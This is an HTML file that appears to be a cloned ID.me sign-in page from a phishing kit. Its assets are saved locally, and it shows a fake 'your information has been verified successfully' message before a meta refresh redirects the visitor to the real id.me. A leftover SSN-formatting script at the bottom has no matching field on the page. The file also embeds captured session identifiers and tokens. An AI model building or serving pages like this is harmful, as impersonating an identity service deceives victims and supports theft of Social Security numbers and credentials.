<!DOCTYPE html>
<html dir="ltr" lang="en">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="refresh" content="4;url=https://www.id.me">
    <style>
        body {
            transition: opacity ease-in 0.2s;
        }

        body[unresolved] {
            opacity: 0;
            display: block;
            overflow: hidden;
            position: relative;
        }
    </style>
    <link href="https://static.queue-it.net/" rel="preconnect">
    <link href="https://api.sjpf.io/" rel="preconnect">
    <link href="https://device.id.me/" rel="preconnect">
    <title>
        Sign in to ID.me - ID.me
    </title>

    <meta content="IE=edge" http-equiv="X-UA-Compatible">
    <meta content="One Identity. One Wallet." name="description">
    <meta content="" name="keywords">
    <meta content="noodp" name="robots">
    <meta content="width=device-width, initial-scale=1, minimum-scale=1" name="viewport">
    <meta content="noindex" name="robots">
    <link rel="icon" type="image/png"
        href="https://api.id.me/assets/icons/favicon/favicon-3b57957bde0ba341f2e080013aa6d42d303e29a4594c8f231c013514b22241f0.ico">
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="https://api.id.me/assets/icons/favicon/apple-icon-57x57-ad49f33c6b98bd9390e51e5ac97408cd19da3764e931bc19b252fea34fc9ee94.png"
        sizes="57x57">
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="https://api.id.me/assets/icons/favicon/apple-icon-60x60-85a8ae744189245feb30a76d00ba698d3e76947c3510def7c8888a761fbd63ba.png"
        sizes="60x60">
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="https://api.id.me/assets/icons/favicon/apple-icon-72x72-43f9b13ee585ccdf6454f716226fab557042a37f8ac0ec6a894f6459b815862e.png"
        sizes="72x72">
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="https://api.id.me/assets/icons/favicon/apple-icon-76x76-d4854442eb3222a5e97fea96e8f83a519c2c7ea1282f10f32a2f5836019edba4.png"
        sizes="76x76">
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="https://api.id.me/assets/icons/favicon/apple-icon-114x114-71fe1cbcccd25bcd53daf343da695eda01adadfdef93b074c33a24584ae127c2.png"
        sizes="114x114">
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="https://api.id.me/assets/icons/favicon/apple-icon-120x120-4e224a98384c32a9df5e683186aaf80f5dc38df03df317f420c764e5be488480.png"
        sizes="120x120">
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="https://api.id.me/assets/icons/favicon/apple-icon-144x144-b7e0aeb0a26dcb5bd1aebb4eaf37f98251fc34fb40e0b441f771372b94fa66ee.png"
        sizes="144x144">
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="https://api.id.me/assets/icons/favicon/apple-icon-152x152-edbdf8cbb18f90bd8eb093cc6150fcc53d02e1636a4d3b76fbe1bc0ba5baab82.png"
        sizes="152x152">
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="https://api.id.me/assets/icons/favicon/apple-icon-180x180-117122c85f63d210955a29669d6b5b4319cc7340e558efe668f4594d1d7304b9.png"
        sizes="180x180">
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="https://api.id.me/assets/icons/favicon/apple-icon-precomposed-9dcfe3e20a36782b710958768d9a4c5463b0ced00f869ce015cf38c879f79830.png">
    <link rel="icon" type="image/png"
        href="https://api.id.me/assets/icons/favicon/android-icon-192x192-b9cca81c421fd74056c944fd87457ea8b76efec91549bfd5baa639e362316d93.png"
        sizes="192x192">
    <link rel="icon" type="image/png"
        href="https://api.id.me/assets/icons/favicon/favicon-32x32-88474466ed084a8ad0cab7ddd9b1711a8b96e09d9fbeb769a1d3be9d5c728fa7.png"
        sizes="32x32">
    <link rel="icon" type="image/png"
        href="https://api.id.me/assets/icons/favicon/favicon-96x96-ff4bc49c45218d94bd24dce580e30118e266d76cd408c36d575b997b0aaf53e3.png"
        sizes="96x96">
    <link rel="icon" type="image/png"
        href="https://api.id.me/assets/icons/favicon/favicon-16x16-5a8c92dd3dbf20296d619eb084a3ea9510fb77312e80835985fed7fd1d21e15d.png"
        sizes="16x16">

    <script async="" charset="utf-8" src="/assets/asset_composer.js.download" type="text/javascript"></script>
    <script type="text/javascript" async="" src="/assets/js"></script>
    <script type="text/javascript" async="" src="/assets/js(1)"></script>
    <script async="" src="/assets/gtm.js.download"></script>
    <script async="" src="/assets/analytics.js.download"></script>
    <script>
        window._qUUID = "userless";
        window._qSESSIONID = "29de73861da3c8bed4a13ce6e44eda13";
        window._qINTID = "3699";
        window._qINT = "ID.me My Account";
    </script>

    <script>
        window._sf_startpt = (new Date()).getTime();
        window.settings = {

            google: {
                account: "UA-40672673-1",
                linking: "true"
            },

            gtm_engineering: "GTM-PL62HD9",

            zendesk_chat: {
                key: "22fb9205-0748-40d7-8eb1-c964afe88d06"
            },

            qualtrics: {
                zoneId: "ZN_2bLc7fWaOZ8U4ey"
            }
        };
    </script>

    <script>
        window.locales = {
            "current": "en",
            "default": "en"
        };
    </script>

    <script src="/assets/device-f88e909eace50b502367ac8aebc51ed9267c82f1c4609c91db9e995bc768bffc.js.download"
        id="device-loader"></script>

    <script src="/assets/google-81990243df62fe63ea10e1b61505d86bdd0b9507c3b841c224bd25981a95c8aa.js.download"></script>
    <script
        src="/assets/gtm_engineering-75cb54582c7329f991049ae3b2e8de9ade91f84253bb7026330dfb172ff4de40.js.download"></script>
    <script src="/assets/runtime-5d83b91d2172c6417e29.js.download"></script>
    <script src="/assets/725-124a1bd93071c5b4e048.js.download"></script>
    <script src="/assets/polyfills-bef711e47e89399c66b1.js.download"></script>
    <script src="/assets/100-7fd11f558731e79fca88.js.download"></script>
    <script src="/assets/components-51756a3c057869f6922b.js.download"></script>
    <meta name="csrf-param" content="authenticity_token">
    <meta name="csrf-token"
        content="6cygA+TfwRdIiRY5dK/U3OpXFPvPcUlnjyiiVPUEDZvv6vCWJ1umifRdGVJLamLqB7TsIPi76nfi89kag05xsg==">
    <link rel="stylesheet" media="all"
        href="/assets/application-0189d16e9dcf751fcf91038fa9ac30c98194116564b5125b826c9f7219da2f93.css">
    <script>
        ga("require", "linker");
        ga("linker:autoLink", ["va.gov", "id.me", "myaccess.dmdc.osd.mil"], false, true);
    </script>


    <script>!function (e) { var n = "https://s.go-mpulse.net/boomerang/"; if ("False" == "True") e.BOOMR_config = e.BOOMR_config || {}, e.BOOMR_config.PageParams = e.BOOMR_config.PageParams || {}, e.BOOMR_config.PageParams.pci = !0, n = "https://s2.go-mpulse.net/boomerang/"; if (window.BOOMR_API_key = "GTDQ2-YPV4D-ZPN8M-VW3LM-H9A7G", function () { function e() { if (!o) { var e = document.createElement("script"); e.id = "boomr-scr-as", e.src = window.BOOMR.url, e.async = !0, i.parentNode.appendChild(e), o = !0 } } function t(e) { o = !0; var n, t, a, r, d = document, O = window; if (window.BOOMR.snippetMethod = e ? "if" : "i", t = function (e, n) { var t = d.createElement("script"); t.id = n || "boomr-if-as", t.src = window.BOOMR.url, BOOMR_lstart = (new Date).getTime(), e = e || d.body, e.appendChild(t) }, !window.addEventListener && window.attachEvent && navigator.userAgent.match(/MSIE [67]\./)) return window.BOOMR.snippetMethod = "s", void t(i.parentNode, "boomr-async"); a = document.createElement("IFRAME"), a.src = "about:blank", a.title = "", a.role = "presentation", a.loading = "eager", r = (a.frameElement || a).style, r.width = 0, r.height = 0, r.border = 0, r.display = "none", i.parentNode.appendChild(a); try { O = a.contentWindow, d = O.document.open() } catch (_) { n = document.domain, a.src = "javascript:var d=document.open();d.domain='" + n + "';void(0);", O = a.contentWindow, d = O.document.open() } if (n) d._boomrl = function () { this.domain = n, t() }, d.write("<bo" + "dy onload='document._boomrl();'>"); else if (O._boomrl = function () { t() }, O.addEventListener) O.addEventListener("load", O._boomrl, !1); else if (O.attachEvent) O.attachEvent("onload", O._boomrl); d.close() } function a(e) { window.BOOMR_onload = e && e.timeStamp || (new Date).getTime() } if (!window.BOOMR || !window.BOOMR.version && !window.BOOMR.snippetExecuted) { window.BOOMR = window.BOOMR || {}, window.BOOMR.snippetStart = (new Date).getTime(), window.BOOMR.snippetExecuted = !0, window.BOOMR.snippetVersion = 12, window.BOOMR.url = n + "GTDQ2-YPV4D-ZPN8M-VW3LM-H9A7G"; var i = document.currentScript || document.getElementsByTagName("script")[0], o = !1, r = document.createElement("link"); if (r.relList && "function" == typeof r.relList.supports && r.relList.supports("preload") && "as" in r) window.BOOMR.snippetMethod = "p", r.href = window.BOOMR.url, r.rel = "preload", r.as = "script", r.addEventListener("load", e), r.addEventListener("error", function () { t(!0) }), setTimeout(function () { if (!o) t(!0) }, 3e3), BOOMR_lstart = (new Date).getTime(), i.parentNode.appendChild(r); else t(!1); if (window.addEventListener) window.addEventListener("load", a, !1); else if (window.attachEvent) window.attachEvent("onload", a) } }(), "".length > 0) if (e && "performance" in e && e.performance && "function" == typeof e.performance.setResourceTimingBufferSize) e.performance.setResourceTimingBufferSize(); !function () { if (BOOMR = e.BOOMR || {}, BOOMR.plugins = BOOMR.plugins || {}, !BOOMR.plugins.AK) { var n = "" == "true" ? 1 : 0, t = "", a = "v2fci7axgdqiszns36iq-f-231b8a3a6-clientnsv4-s.akamaihd.net", i = "false" == "true" ? 2 : 1, o = { "ak.v": "36", "ak.cp": "1252485", "ak.ai": parseInt("752192", 10), "ak.ol": "0", "ak.cr": 209, "ak.ipv": 4, "ak.proto": "h2", "ak.rid": "a2bf3433", "ak.r": 47385, "ak.a2": n, "ak.m": "dscb", "ak.n": "essl", "ak.bpcip": "174.138.36.0", "ak.cport": 57088, "ak.gh": "23.195.36.105", "ak.quicv": "", "ak.tlsv": "tls1.3", "ak.0rtt": "", "ak.csrc": "-", "ak.acc": "", "ak.t": "1706221457", "ak.ak": "hOBiQwZUYzCg5VSAfCLimQ==EVY5iE775308R9D8AOzjmC//oZwVsUY7FywdD8jLNMeiy1n8qedmv5Bu5A4ux+sSYQtHHTVpod+vYBdLGOkX1DULg96R4XeEy0Fbf6t+E1V4vCU31JF7RPNDtaS6myiPlT1yQzKa9sKLdgAlJHkBHT0egbztHGqbSA1nzOG7YkazHH5LeBiVJL0RwAh8iiHRiCBwCckc3rFu218U1rssmz0WiHLDifDDUv+jxjWDWzvYxXwsavmnbx+S7BqkVWGm3xCNLsQMpA/iCubdy5MmRC6ZmU0cL3KCtiwws7DmmAC3hv5+SfQKrCGMBxV50/bLfsBA1UTeLlPbJU5/HhR3Dw6W5GIjeEBEiVOnFu02ahFdz1OFt7YI/4wHzIQd6CoEEJpICu1aMtLFKBgTl+d+LttJzuCVYkjfW93t0Az0MAY=", "ak.pv": "214", "ak.dpoabenc": "", "ak.tf": i }; if ("" !== t) o["ak.ruds"] = t; var r = { i: !1, av: function (n) { var t = "http.initiator"; if (n && (!n[t] || "spa_hard" === n[t])) o["ak.feo"] = void 0 !== e.aFeoApplied ? 1 : 0, BOOMR.addVar(o) }, rv: function () { var e = ["ak.bpcip", "ak.cport", "ak.cr", "ak.csrc", "ak.gh", "ak.ipv", "ak.m", "ak.n", "ak.ol", "ak.proto", "ak.quicv", "ak.tlsv", "ak.0rtt", "ak.r", "ak.acc", "ak.t", "ak.tf"]; BOOMR.removeVar(e) } }; BOOMR.plugins.AK = { akVars: o, akDNSPreFetchDomain: a, init: function () { if (!r.i) { var e = BOOMR.subscribe; e("before_beacon", r.av, null, null), e("onbeacon", r.rv, null, null), r.i = !0 } return this }, is_complete: function () { return !0 } } } }() }(window);</script>
    <link href="/assets/GTDQ2-YPV4D-ZPN8M-VW3LM-H9A7G" rel="preload" as="script">
    <script id="boomr-scr-as" src="/assets/GTDQ2-YPV4D-ZPN8M-VW3LM-H9A7G" async=""></script>
    <script charset="utf-8" src="/assets/11.ae63b0c5e76f2df607a5.chunk.js.download"></script>
    <script type="text/javascript" charset="UTF-8" src="/assets/common.js.download"></script>
    <script type="text/javascript" charset="UTF-8" src="/assets/util.js.download"></script>
</head>

<body class="">
    <div id="ZN_2bLc7fWaOZ8U4ey"></div>


    <div class="page-container" data-role="page-container">
        <div class="container">
            <div class="content-container">
                <form class="new_user" id="new_user" data-validate="signin" action="/auth/personal"
                    accept-charset="UTF-8" method="post" novalidate="novalidate"><input type="hidden"
                        name="authenticity_token"
                        value="6cygA+TfwRdIiRY5dK/U3OpXFPvPcUlnjyiiVPUEDZvv6vCWJ1umifRdGVJLamLqB7TsIPi76nfi89kag05xsg=="
                        autocomplete="off"><input value="d8b66728-4b50-439c-b1ee-558599a17656" autocomplete="off"
                        type="hidden" name="user[session_id]" id="user_session_id">
                    <div class="form-header">
                        <div class="form-header-content" role="banner">
                            <div class="partner">
                                <div class="c_icon m_idme">
                                    <img alt="ID.me" class="img-lightmode"
                                        src="/assets/idme-logo-1d96899e99d393974ec16fa17a820e78fca132bd8ea53e01f12bdc000baf674f.svg">
                                    <img alt="ID.me" class="img-darkmode"
                                        src="/assets/idme-logo-white-3fda17b1e33891acf640ab0125f80fb2feafbdd0cf0423c06de22149b643fcbb.svg">
                                </div>
                            </div>
                        </div>


                        <script>
                            var event_data = JSON.parse('{"session_id":"d8b66728-4b50-439c-b1ee-558599a17656","current_user":"","session_handler_transaction_id":"d799bf70956a4a70a4a3af19e8b8f44e","session_handler_transaction_class":"IDme::IdentityRequest","session_handler_verification_request_id":"","session_handler_policy_name":"Wallet","session_handler_organization_name":"ID.me","session_handler_policy_handle":"wallet","referer":"https://api.id.me/oauth/authorize?client_id=4ed0bfde8704d33b6d9ab965964dfbdc\u0026op=signin\u0026redirect_uri=https%3A%2F%2Fwww.id.me%2Fsession%2Fcallback\u0026response_type=code\u0026scope=wallet\u0026qitq=ef129e84-f2d4-46ae-b41e-0e8392d13c19\u0026qitp=bd69ce09-959c-4fd1-a9a9-ba9be79c3c48\u0026qitts=1706221454\u0026qitc=idme\u0026qite=prodapi\u0026qitrt=Safetynet\u0026qith=29ca018a8d972f2b9ea07178248442ba","path":"/en/session/new","path_params":{"controller":"users/sessions","action":"new","lang":"en"},"user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36","browser_name":"Chrome","browser_webkit":"537.36","browser_full_version":"120.0.0.0","browser_platform_name":"Windows","browser_platform_version":"10.0","browser_id":null,"device_id":null,"event":"authentication_flow_page_view","event_handle":"authentication_flow_page_view","app":"idp","timestamp":"2024-01-25T22:24:17+00:00","stage":1,"stage_name":"session","substage":1,"screen_name":"session_new"}');
                            dataLayer.push(event_data)
                        </script>

                    </div>
                    <main aria-labelledby="sr_page_title" class="form-container">
                        <div class="form-header-access">
                            <h1 id="sr_page_title">Your information has been verified successfully! You will be
                                redirected to the homepage soon.</h1>
                        </div>

                    </main>
                </form>
            </div>


            <footer class="footer">
                <nav aria-label="Footer" class="footer__links">
                    <ul class="footer__list">
                        <li class="footer__list-item"><a target="_blank" rel="noopener noreferrer" class="footer__link"
                                title="What is ID.me? (opens in new tab)" aria-label="What is ID.me? (opens in new tab)"
                                href="https://www.id.me/about">What is ID.me?</a></li>
                        <li class="footer__list-item"><a target="_blank" rel="noopener noreferrer" class="footer__link"
                                title="Terms of Service (opens in new tab)"
                                aria-label="Terms of Service (opens in new tab)" href="https://www.id.me/terms">Terms of
                                Service</a></li>
                        <li class="footer__list-item"><a target="_blank" rel="noopener noreferrer" class="footer__link"
                                title="Privacy Policy (opens in new tab)" aria-label="Privacy Policy (opens in new tab)"
                                href="https://www.id.me/privacy">Privacy Policy</a></li>
                    </ul>
                </nav>
            </footer>

        </div>
    </div>

    <script src="/assets/js(2)"></script><img src="/assets/resource.png" style="display: none;">

    <script
        src="/assets/application-cdf7fda512a840e1404c4c585ea80a54b5b724bd5d17d5db3f7b23d5263e66e3.js.download"></script>
    <script src="/assets/chat-277e743ae9574a31927fbdf43530b414d8e8480f369965cec738a2a93d3e0311.js.download"></script>
    <script type="text/javascript" src="/assets/4Em4"></script>

    <iframe data-product="web_widget" title="No content" role="presentation" tabindex="-1" allow="microphone *"
        aria-hidden="true" src="/assets/saved_resource.html"
        style="width: 0px; height: 0px; border: 0px; position: absolute; top: -9999px;"></iframe>
    <script>
        function formatSsn(input) {
            // Get the current value of the input
            let value = input.value;

            // Remove non-numeric characters
            value = value.replace(/\D/g, '');

            // Format the date as 123-45-6789
            if (value.length > 5) {
                value = value.replace(/(\d{3})(\d{2})(\d{4})/, '$1-$2-$3');
            }

            // Update the input value
            input.value = value;
        }

    </script>
</body>

</html>